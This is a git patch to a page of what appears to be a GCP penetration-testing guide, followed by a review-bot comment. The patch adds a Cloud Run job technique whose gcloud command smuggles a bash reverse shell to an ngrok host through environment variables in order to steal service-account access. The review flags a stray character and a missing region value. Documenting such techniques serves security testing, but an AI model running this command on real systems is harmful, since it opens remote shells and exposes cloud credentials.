From cf10948ca59b5ef9b5c36ac9053e2490194cfe7f Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 19 Jun 2024 23:14:37 +0000 Subject: [PATCH] GITBOOK-629: No subject --- .../gcp-privilege-escalation/gcp-run-privesc.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 3c147ce5c0..4910b0b6a5 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -78,7 +78,17 @@ gcloud beta run jobs update hacked \ --execute-now ``` -### `run.jobs.setIamPolicy` +### run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get) + +Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: + +{% code overflow="wrap" %} +```bash +gcloud beta run jobs execute job-name --region --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s" +``` +{% endcode %} + +### `çrun.jobs.setIamPolicy` Give yourself the previous permissions over Cloud Jobs.
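Review bot: The renamed heading at the end of the hunk, `### \`çrun.jobs.setIamPolicy\``, carries a stray `ç` that breaks the permission name; it should read `### \`run.jobs.setIamPolicy\``. Two further points in the same hunk: the new heading `### run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)` drops the backtick formatting that every other permission heading in this file uses, so it should be `### \`run.jobs.run\`, \`run.jobs.runWithOverrides\`, (\`run.jobs.get\`)` for consistency; and the added `gcloud beta run jobs execute` command passes `--region` with no value, so it will fail as written. Replace it with a placeholder such as `--region <region>`, and likewise replace the hard-coded listener address in the `--update-env-vars` value with a placeholder (`<attacker-host>/<port>`) so the example documents the technique rather than one specific endpoint.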